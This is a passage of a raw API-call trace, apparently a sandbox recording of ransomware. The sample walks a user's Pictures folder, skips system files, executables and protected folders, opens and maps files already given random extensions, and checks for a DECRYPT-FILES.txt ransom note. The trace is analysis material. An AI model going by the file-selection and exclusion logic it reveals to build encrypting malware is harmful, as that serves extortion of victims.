ftCreationTime.dwLowDateTime=0x768ce4f0, ftCreationTime.dwHighDateTime=0x1d4c5b3, ftLastAccessTime.dwLowDateTime=0x2bec00c0, ftLastAccessTime.dwHighDateTime=0x1d4ca6d, ftLastWriteTime.dwLowDateTime=0xafbf9160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb809, dwReserved0=0x0, dwReserved1=0x0, cFileName="upBbqKtvqsUVFBqU.png.8PDnT", cAlternateFileName="UPBBQK~1.8PD")) returned 1 [0186.065] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="DECRYPT-FILES.txt") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="autorun.inf") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="boot.ini") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="desktop.ini") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="ntuser.dat") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="iconcache.db") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="bootsect.bak") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="ntuser.dat.log") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="thumbs.db") returned 1 [0186.066] lstrcmpiW (lpString1="upBbqKtvqsUVFBqU.png.8PDnT", lpString2="Bootfont.bin") returned 1 [0186.066] lstrlenW (lpString="upBbqKtvqsUVFBqU.png.8PDnT") returned 26 [0186.066] lstrcmpiW (lpString1="8PDnT", lpString2="lnk") returned -1 [0186.066] lstrcmpiW (lpString1="8PDnT", lpString2="exe") returned -1 [0186.066] lstrcmpiW (lpString1="8PDnT", lpString2="sys") returned -1 [0186.066] lstrcmpiW (lpString1="8PDnT", lpString2="dll") returned -1 [0186.066] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.066] lstrlenW (lpString="upBbqKtvqsUVFBqU.png.8PDnT") returned 26 [0186.066] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.066] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="upBbqKtvqsUVFBqU.png.8PDnT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png.8PDnT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png.8PDnT" [0186.066] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\upBbqKtvqsUVFBqU.png.8PDnT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\upbbqktvqsuvfbqu.png.8pdnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.066] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=47113) returned 1 [0186.067] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.067] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.067] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.067] CloseHandle (hObject=0x268) returned 1 [0186.067] CloseHandle (hObject=0x264) returned 1 [0186.067] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.068] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x234d55d0, ftCreationTime.dwHighDateTime=0x1d4c81b, ftLastAccessTime.dwLowDateTime=0x2f8323c0, ftLastAccessTime.dwHighDateTime=0x1d4c758, ftLastWriteTime.dwLowDateTime=0xafbf9160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3746, dwReserved0=0x0, dwReserved1=0x0, cFileName="xS-NM.png.8PDnT", cAlternateFileName="XS-NMP~1.8PD")) returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="DECRYPT-FILES.txt") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="autorun.inf") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="boot.ini") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="desktop.ini") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="ntuser.dat") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="iconcache.db") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="bootsect.bak") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="ntuser.dat.log") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="thumbs.db") returned 1 [0186.068] lstrcmpiW (lpString1="xS-NM.png.8PDnT", lpString2="Bootfont.bin") returned 1 [0186.068] lstrlenW (lpString="xS-NM.png.8PDnT") returned 15 [0186.068] lstrcmpiW (lpString1="8PDnT", lpString2="lnk") returned -1 [0186.068] lstrcmpiW (lpString1="8PDnT", lpString2="exe") returned -1 [0186.068] lstrcmpiW (lpString1="8PDnT", lpString2="sys") returned -1 [0186.068] lstrcmpiW (lpString1="8PDnT", lpString2="dll") returned -1 [0186.068] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.068] lstrlenW (lpString="xS-NM.png.8PDnT") returned 15 [0186.068] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.068] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="xS-NM.png.8PDnT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png.8PDnT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png.8PDnT" [0186.068] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\xS-NM.png.8PDnT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\xs-nm.png.8pdnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.069] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=14150) returned 1 [0186.069] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.069] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.070] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.070] CloseHandle (hObject=0x268) returned 1 [0186.070] CloseHandle (hObject=0x264) returned 1 [0186.070] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.070] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc8a5e0, ftCreationTime.dwHighDateTime=0x1d4d515, ftLastAccessTime.dwLowDateTime=0xbefdf8f0, ftLastAccessTime.dwHighDateTime=0x1d4cdbf, ftLastWriteTime.dwLowDateTime=0xafc6b580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbc97, dwReserved0=0x0, dwReserved1=0x0, cFileName="YswvYHAlz U.bmp.1ZY6CM6", cAlternateFileName="YSWVYH~1.1ZY")) returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="DECRYPT-FILES.txt") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="autorun.inf") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="boot.ini") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="desktop.ini") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="ntuser.dat") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="iconcache.db") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="bootsect.bak") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="ntuser.dat.log") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="thumbs.db") returned 1 [0186.070] lstrcmpiW (lpString1="YswvYHAlz U.bmp.1ZY6CM6", lpString2="Bootfont.bin") returned 1 [0186.070] lstrlenW (lpString="YswvYHAlz U.bmp.1ZY6CM6") returned 23 [0186.070] lstrcmpiW (lpString1="1ZY6CM6", lpString2="lnk") returned -1 [0186.070] lstrcmpiW (lpString1="1ZY6CM6", lpString2="exe") returned -1 [0186.071] lstrcmpiW (lpString1="1ZY6CM6", lpString2="sys") returned -1 [0186.071] lstrcmpiW (lpString1="1ZY6CM6", lpString2="dll") returned -1 [0186.071] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.071] lstrlenW (lpString="YswvYHAlz U.bmp.1ZY6CM6") returned 23 [0186.071] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.071] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="YswvYHAlz U.bmp.1ZY6CM6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp.1ZY6CM6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp.1ZY6CM6" [0186.071] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\YswvYHAlz U.bmp.1ZY6CM6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\yswvyhalz u.bmp.1zy6cm6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.071] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=48279) returned 1 [0186.071] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.071] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.072] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.072] CloseHandle (hObject=0x268) returned 1 [0186.072] CloseHandle (hObject=0x264) returned 1 [0186.072] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.072] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc8a5e0, ftCreationTime.dwHighDateTime=0x1d4d515, ftLastAccessTime.dwLowDateTime=0xbefdf8f0, ftLastAccessTime.dwHighDateTime=0x1d4cdbf, ftLastWriteTime.dwLowDateTime=0xafc6b580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbc97, dwReserved0=0x0, dwReserved1=0x0, cFileName="YswvYHAlz U.bmp.1ZY6CM6", cAlternateFileName="YSWVYH~1.1ZY")) returned 0 [0186.072] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.073] CloseHandle (hObject=0x25c) returned 1 [0186.073] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9056ba50, ftCreationTime.dwHighDateTime=0x1d4cf3b, ftLastAccessTime.dwLowDateTime=0x259504c0, ftLastAccessTime.dwHighDateTime=0x1d4d093, ftLastWriteTime.dwLowDateTime=0xafc6b580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x108d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", cAlternateFileName="YJXANQ~1.1ZY")) returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="DECRYPT-FILES.txt") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="autorun.inf") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="boot.ini") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="desktop.ini") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="ntuser.dat") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="iconcache.db") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="bootsect.bak") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="ntuser.dat.log") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="thumbs.db") returned 1 [0186.073] lstrcmpiW (lpString1="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6", lpString2="Bootfont.bin") returned 1 [0186.073] lstrlenW (lpString="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6") returned 28 [0186.073] lstrcmpiW (lpString1="1ZY6CM6", lpString2="lnk") returned -1 [0186.073] lstrcmpiW (lpString1="1ZY6CM6", lpString2="exe") returned -1 [0186.073] lstrcmpiW (lpString1="1ZY6CM6", lpString2="sys") returned -1 [0186.073] lstrcmpiW (lpString1="1ZY6CM6", lpString2="dll") returned -1 [0186.073] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.073] lstrlenW (lpString="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6") returned 28 [0186.073] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0186.073] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="YjxAnqh-TfT9kDkn.jpg.1ZY6CM6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg.1ZY6CM6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg.1ZY6CM6" [0186.073] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YjxAnqh-TfT9kDkn.jpg.1ZY6CM6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yjxanqh-tft9kdkn.jpg.1zy6cm6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.074] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=67794) returned 1 [0186.074] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.074] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.074] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.075] CloseHandle (hObject=0x260) returned 1 [0186.075] CloseHandle (hObject=0x25c) returned 1 [0186.075] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.075] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3860b20, ftCreationTime.dwHighDateTime=0x1d4ca14, ftLastAccessTime.dwLowDateTime=0xb00bbd60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb00bbd60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZeLlJvzMNja", cAlternateFileName="ZELLJV~1")) returned 1 [0186.075] lstrcmpW (lpString1="ZeLlJvzMNja", lpString2=".") returned 1 [0186.075] lstrcmpW (lpString1="ZeLlJvzMNja", lpString2="..") returned 1 [0186.075] lstrcatW (in: lpString1="ZeLlJvzMNja", lpString2="\\" | out: lpString1="ZeLlJvzMNja\\") returned="ZeLlJvzMNja\\" [0186.075] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Program Files") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch=":\\Windows") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Games\\") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\All Users") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="AhnLab") returned 0x0 [0186.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.075] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.075] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.075] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\\\0a16c9.tmp") returned 62 [0186.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.077] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.077] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.077] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\\\DECRYPT-FILES.txt") returned 69 [0186.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.078] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\*" [0186.078] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3860b20, ftCreationTime.dwHighDateTime=0x1d4ca14, ftLastAccessTime.dwLowDateTime=0xf19ddf60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf19ddf60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.078] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.078] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3860b20, ftCreationTime.dwHighDateTime=0x1d4ca14, ftLastAccessTime.dwLowDateTime=0xf19ddf60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf19ddf60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.078] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.078] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.078] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf19ddf60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf19ddf60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf19ddf60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.078] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.078] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.078] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.078] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.078] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.078] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.078] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.078] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.078] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", 